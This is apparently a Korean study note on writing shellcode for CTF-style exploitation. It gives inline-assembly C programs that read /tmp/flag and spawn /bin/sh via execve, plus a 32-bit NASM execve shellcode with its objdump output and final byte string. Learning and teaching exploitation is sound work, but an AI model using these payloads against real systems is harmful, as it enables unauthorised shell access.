shellcode
쉘코드
rax(시스템콜 넘버), rdi, rsi, rdx, … 에 인자를 세팅하고 syscall 명령으로 시스템콜을 호출해서 원하는 작업을 수행하는 바이트 코드이다.
쉘코드가 공유되는 사이트: https://shell-storm.org/shellcode/index.html
open-read-write
시스템의 flag 값을 읽어올 때 사용되는 함수들의 모음이다. 파일을 버퍼로 읽어오고 stdout으로 출력해준다. 인자의 순서에 맞게 rdi, rsi, rdx 등을 적고 syscall을 호출하면된다.
char buf[0x30];
int fd = open("/tmp/flag", RD_ONLY, NULL);
read(fd, buf, 0x30);
write(1, buf, 0x30);
쉘코드만으로는 실행파일을 만들 수 없기 때문에 asm 인자로 문자열을 넣어(명령어는 \n으로 구분된다) 쉘코드를 작성하고 run_sh 라는 이름을 붙여준 뒤 main에서 호출하게 하면서 쉘코드의 동작을 확인할 수 있다.
컴파일 할땐 쉘코드의 타입을 알려줘야 한다.(intel)
// File name: orw.c
// Compile: gcc -o orw orw.c -masm=intel
__asm__(
".global run_sh\n"
"run_sh:\n"
"push 0x67\n"
"mov rax, 0x616c662f706d742f \n"
"push rax\n"
"mov rdi, rsp # rdi = '/tmp/flag'\n"
"xor rsi, rsi # rsi = 0 ; RD_ONLY\n"
"xor rdx, rdx # rdx = 0\n"
"mov rax, 2 # rax = 2 ; syscall_open\n"
"syscall # open('/tmp/flag', RD_ONLY, NULL)\n"
"\n"
"mov rdi, rax # rdi = fd\n"
"mov rsi, rsp\n"
"sub rsi, 0x30 # rsi = rsp-0x30 ; buf\n"
"mov rdx, 0x30 # rdx = 0x30 ; len\n"
"mov rax, 0x0 # rax = 0 ; syscall_read\n"
"syscall # read(fd, buf, 0x30)\n"
"\n"
"mov rdi, 1 # rdi = 1 ; fd = stdout\n"
"mov rax, 0x1 # rax = 1 ; syscall_write\n"
"syscall # write(fd, buf, 0x30)\n"
"\n"
"xor rdi, rdi # rdi = 0\n"
"mov rax, 0x3c # rax = sys_exit\n"
"syscall # exit(0)");
void run_sh();
int main() { run_sh(); }
execve
이 시스템콜을 이용하면 쉘을 획득할 수 있다.
// File name: execve.c
// Compile Option: gcc -o execve execve.c -masm=intel
__asm__(
".global run_sh\n"
"run_sh:\n"
"mov rax, 0x68732f6e69622f\n"
"push rax\n"
"mov rdi, rsp # rdi = '/bin/sh'\n"
"xor rsi, rsi # rsi = NULL\n"
"xor rdx, rdx # rdx = NULL\n"
"mov rax, 0x3b # rax = sys_execve\n"
"syscall # execve('/bin/sh', null, null)\n"
"xor rdi, rdi # rdi = 0\n"
"mov rax, 0x3c # rax = sys_exit\n"
"syscall # exit(0)");
void run_sh();
int main() { run_sh(); }
쉘코드 만들기
실제로 쉘코드를 공격에 사용하기 위해서는 위에서 사용하는 방법으로 테스트할 수 있고, 정상 동작이 확인되면, 바이트화해서 다른 공격과 함께 사용한다.
- 쉘코드 작성
; File name: shellcode.asm
section .text
global _start
_start:
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
xor ecx, ecx
xor edx, edx
mov al, 0xb
int 0x80
- 쉘코드 확인
nsam으로 elf 파일로 어셈블 후 명령어를 덤프해서 주소값이 0부터 구작성되어 있는지 확인
$ sudo apt-get install nasm
$ nasm -f elf shellcode.asm
$ objdump -d shellcode.o
shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: 50 push %eax
3: 68 2f 2f 73 68 push $0x68732f2f
8: 68 2f 62 69 6e push $0x6e69622f
d: 89 e3 mov %esp,%ebx
f: 31 c9 xor %ecx,%ecx
11: 31 d2 xor %edx,%edx
13: b0 0b mov $0xb,%al
15: cd 80 int $0x80
- 바이트 코드로 변경
$ objcopy --dump-section .text=shellcode.bin shellcode.o
$ xxd shellcode.bin
00000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e331 1.Ph//shh/bin..1
00000010: c931 d2b0 0bcd 80 .1.....
# execve /bin/sh shellcode:
$ xxd -p shellcode.bin
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"
Comments